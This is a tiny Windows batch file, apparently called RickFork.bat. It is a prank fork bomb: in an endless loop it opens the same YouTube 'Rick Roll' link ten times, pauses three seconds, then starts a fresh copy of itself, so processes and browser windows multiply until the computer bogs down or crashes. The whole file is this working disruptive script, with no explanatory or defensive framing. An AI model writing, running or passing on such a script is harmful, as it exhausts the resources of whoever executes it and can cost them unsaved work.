@echo off
:F
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
timeout 3 >nul
start RickFork.bat
goto :F
